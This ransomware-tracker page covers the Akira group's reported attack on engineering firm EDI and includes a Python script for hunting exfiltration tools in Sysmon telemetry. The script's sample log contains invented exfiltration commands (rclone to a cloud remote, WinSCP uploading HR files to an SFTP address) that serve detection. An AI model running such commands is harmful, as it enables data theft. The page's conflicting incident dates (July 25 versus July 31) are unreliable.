Ransomware Attack on EDI by Akira Group: Data Breach Details

Incident Date:

July 25, 2024

Overview

Victim

Environmental Design International

Attacker

Akira

Location

Chicago, Illinois, USA

First Reported

July 25, 2024

Ransomware Attack on Environmental Design International Inc. by Akira Group

Overview of Environmental Design International Inc. (EDI)

Environmental Design International Inc. (EDI) is a professional engineering firm based in Chicago, Illinois, established in 1991. With over three decades of experience, EDI has built a reputation for delivering high-quality engineering consulting services across multiple disciplines, including civil engineering, construction engineering, land surveying, environmental consulting, and industrial hygiene. The firm is recognized for its commitment to excellence, innovation, and sustainability, making it a key player in significant infrastructure projects.

Details of the Ransomware Attack

On July 31, 2024, EDI fell victim to a ransomware attack attributed to the Akira group. The attackers claim to have exfiltrated roughly 60 GB of data, including non-disclosure agreements (NDAs), confidential agreements, employees' personal documents, and detailed financial records. Because Akira practises double extortion, the stolen data can be published on the group's leak site whether or not EDI restores its systems from backup, so the firm's exposure goes beyond recovering encrypted machines: client confidentiality, employee privacy, and the financial details of its projects are all at stake.

About the Akira Ransomware Group

Akira is a ransomware family and extortion operation first observed in March 2023 and growing rapidly since. The group targets small to medium-sized businesses across many sectors, including government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunications. Akira employs double extortion: it steals data before encrypting systems, then demands a ransom in exchange for both a decryptor and a promise to delete the stolen data. Reported ransom demands typically range from $200,000 to over $4 million.

How Akira Penetrated EDI's Systems

The specific initial access vector used against EDI has not been reported. In documented Akira intrusions, the group gains initial access through VPN appliances, frequently ones without multi-factor authentication, and through stolen credentials, then moves laterally across the network before deploying the ransomware. Data is staged and exfiltrated with legitimate transfer tools such as RClone, FileZilla, and WinSCP, which are easy to overlook precisely because they are not malware. In some intrusions Akira has also deployed a previously unreported backdoor. The group maintains both Windows and Linux encryptors, and the Linux variant targets VMware ESXi hosts, so a single compromised hypervisor can take down every virtual machine it runs, which makes Akira a formidable threat to organizations like EDI.
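The exfiltration tools named above (RClone, FileZilla, WinSCP) are a practical detection opportunity, because their execution is rare on most endpoints and their command lines reveal a bulk transfer to an external target. The following hunt script is an added example written for this page; it is not code from the RRA site or from any vendor. It assumes Sysmon-style process-creation events flattened to one JSON object per line with the fields `Image`, `OriginalFileName`, `CommandLine`, `User`, and `Computer`; the sample events embedded below are constructed for the demonstration, and the host names, remote names, and IP addresses in them are invented. Matching on `OriginalFileName` rather than the file path is deliberate: it still fires when the operator renames the binary to something innocuous before running it.

```python
"""Hunt for Akira-style exfiltration tooling in process-creation telemetry.

Added example for this page, not code from the RRA tracker or any vendor.
Assumes Sysmon Event ID 1 records flattened to JSON with the fields
Image, OriginalFileName, CommandLine, User and Computer. SAMPLE_LOG is
constructed for the demo; every host, user, remote and address is invented.
"""
import json
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Transfer tools observed in Akira intrusions, keyed by the OriginalFileName
# carried in the PE version resource. That field survives renaming the
# binary on disk, which the file path does not.
EXFIL_TOOLS = {
    "rclone.exe": "rclone",
    "winscp.exe": "WinSCP",
    "filezilla.exe": "FileZilla",
}

# Command-line shapes that indicate a bulk transfer rather than interactive use.
EXFIL_PATTERNS = [
    # rclone copy/sync/move to a named remote (mega:, s3:, b2: ...). The
    # lookahead keeps "C:\..." local paths from matching as a remote.
    re.compile(r"\b(copy|sync|move)\b.*\s\w+:(?![\\/])", re.I),
    # WinSCP scripted session that uploads files
    re.compile(r"/command\b.*\bput\b", re.I),
    # Any embedded (s)ftp URL on the command line
    re.compile(r"\b(ftp|ftps|sftp)://", re.I),
]


@dataclass
class Finding:
    computer: str
    user: str
    tool: str
    severity: str  # "high", "medium" or "low"
    reason: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def analyze_event(ev: dict) -> Optional[Finding]:
    """Return a Finding if this process-creation event looks like exfil tooling."""
    orig = ev.get("OriginalFileName", "").lower()
    tool = EXFIL_TOOLS.get(orig)
    if tool is None:
        return None
    renamed = _basename(ev.get("Image", "")) != orig
    cmd = ev.get("CommandLine", "")
    bulk = any(p.search(cmd) for p in EXFIL_PATTERNS)

    reasons = []
    if renamed:
        reasons.append(f"binary renamed to {_basename(ev.get('Image', ''))}")
    if bulk:
        reasons.append("bulk transfer to a remote target on the command line")
    if renamed and bulk:
        severity = "high"      # hidden tool actively moving data
    elif renamed or bulk:
        severity = "medium"
    else:
        severity = "low"       # tool present; confirm it is sanctioned
        reasons.append("exfil-capable tool executed")
    return Finding(ev.get("Computer", "?"), ev.get("User", "?"),
                   tool, severity, "; ".join(reasons))


def analyze_log(lines: Iterable[str]) -> List[Finding]:
    """Run analyze_event over JSON-lines telemetry, skipping blank lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        finding = analyze_event(json.loads(line))
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample telemetry (four events): renamed rclone pushing a finance
# share to a cloud remote, a scripted WinSCP upload, a benign cmd.exe copy, and
# an administrator listing directories with an unrenamed rclone.
SAMPLE_LOG = r'''
{"Computer":"EDI-FS01","User":"EDI\\svc_backup","Image":"C:\\ProgramData\\svchost.exe","OriginalFileName":"rclone.exe","CommandLine":"svchost.exe copy \"C:\\Shares\\Finance\" mega:edi-finance --transfers 8 -q"}
{"Computer":"EDI-WS17","User":"EDI\\jdoe","Image":"C:\\Users\\jdoe\\Downloads\\winscp.exe","OriginalFileName":"winscp.exe","CommandLine":"winscp.exe /command \"open sftp://exfil@203.0.113.5\" \"put C:\\HR\\*.pdf /drop/\""}
{"Computer":"EDI-WS17","User":"EDI\\jdoe","Image":"C:\\Windows\\System32\\cmd.exe","OriginalFileName":"Cmd.Exe","CommandLine":"cmd.exe /c copy C:\\a.txt D:\\b.txt"}
{"Computer":"EDI-ADM01","User":"EDI\\itadmin","Image":"C:\\Program Files\\rclone\\rclone.exe","OriginalFileName":"rclone.exe","CommandLine":"rclone.exe lsd onedrive:"}
'''

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG.splitlines()):
        print(f"[{f.severity.upper():6}] {f.computer} {f.user}: {f.tool} - {f.reason}")
```

Run against real telemetry, the low-severity hits are the ones to triage against an allow-list of sanctioned backup or sync jobs; the high-severity combination of a renamed binary and a remote target on the command line has no legitimate explanation on a file server and should page someone. Pair this with egress monitoring for large outbound volumes to the same remote, since an operator who drops a tool that is not on this list will still produce the transfer.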

EDI's Vulnerabilities

EDI's involvement in high-profile infrastructure projects and the volume of sensitive client, employee, and financial data it handles make it an attractive target for a group like Akira, which selects victims by the leverage their data provides rather than by sector. The breach underscores that an engineering consultancy holds the same kinds of extortion-worthy data as any other business and needs the same baseline controls against the tactics described above: multi-factor authentication on every remote-access path, credential hygiene, monitoring for bulk outbound transfers, and offline, regularly tested backups.

Sources

Recent Ransomware Attacks